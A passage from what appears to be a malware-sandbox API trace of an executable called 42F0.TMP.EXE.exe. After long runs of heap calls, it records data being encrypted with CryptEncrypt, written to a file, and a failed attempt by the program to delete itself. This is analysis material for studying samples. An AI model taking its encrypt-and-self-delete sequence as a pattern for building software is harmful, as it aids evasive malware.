hHeap=0x1780000) returned 1 [0119.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0119.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0119.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0119.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0119.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0119.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0119.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0119.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0119.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0119.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0119.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0119.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0119.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0119.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0119.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0119.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0119.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0119.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0119.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0119.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0119.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0119.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0119.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0119.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0119.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0119.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0119.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0119.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0119.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0119.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0119.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0119.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0119.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0119.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0119.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0119.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0119.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0119.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0119.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0119.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0119.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0119.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0119.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0119.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0119.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0119.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0119.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0119.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0119.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0119.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0119.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0119.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0119.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0119.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0119.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0119.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0119.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0119.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0119.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0119.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0119.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0119.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0119.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0119.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0119.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0119.504] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0119.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0119.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0119.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0119.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0119.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0119.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0119.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0119.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0119.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0119.504] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0119.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0119.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0119.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0119.504] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0119.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0119.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0119.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0119.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0119.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0119.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0119.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0119.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0119.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0119.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0119.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0119.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0119.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8cd8 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0119.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0119.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0119.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0119.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0119.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0119.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0119.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0119.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0119.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0119.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0119.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0119.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0119.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0119.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0119.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0119.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0119.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0119.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0119.506] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0119.506] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0119.506] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0119.506] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0119.506] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0119.509] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0119.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0119.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cad60, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0119.509] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x1ec00, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x1ec10) returned 1 [0119.509] CharLowerBuffW (in: lpsz="byte[125969]", cchLength=0xc | out: lpsz="byte[125969]") returned 0xc [0119.512] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0119.512] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0119.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0119.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caf70, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0119.512] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48f0048*, pdwDataLen=0x144e790*=0x1ec00, dwBufLen=0x1ec10 | out: pbData=0x48f0048*, pdwDataLen=0x144e790*=0x1ec10) returned 1 [0119.513] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0119.513] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0119.513] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0119.525] WriteFile (in: hFile=0x2a0, lpBuffer=0x499a008*, nNumberOfBytesToWrite=0x1ec10, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x499a008*, lpNumberOfBytesWritten=0x144f194*=0x1ec10, lpOverlapped=0x0) returned 1 [0119.531] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0119.531] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0119.531] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0119.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0119.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca808, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0119.531] CryptDestroyKey (hKey=0x41ac640) returned 1 [0119.531] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0119.531] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0119.531] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0119.531] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0119.532] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0119.532] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0119.532] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0119.532] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0119.532] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0119.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0119.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796f48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0119.532] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0119.532] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0119.532] FreeLibrary (hLibModule=0x756e0000) returned 1 [0119.532] CloseHandle (hObject=0x258) returned 1 [0119.532] CloseHandle (hObject=0x2a0) returned 1 [0119.580] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe", lpFilePart=0x0) returned 0x28 [0119.580] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\42f0.tmp.exe.exe")) returned 0x20 [0119.580] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca667c00, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xca667c00, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0x2e3c7500, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x11ec00, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="42F0.TMP.EXE.exe", cAlternateFileName="42F0TM~1.EXE")) returned 0x41ac500 [0119.580] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\42f0.tmp.exe.exe")) returned 0 [0119.581] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0119.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392308 | out: hHeap=0x1780000) returned 1 [0119.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0119.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0119.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0119.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0119.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0119.581] GetLastError () returned 0x5 [0119.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0119.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0119.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0119.581] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0119.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0119.581] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0119.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0119.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0119.581] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 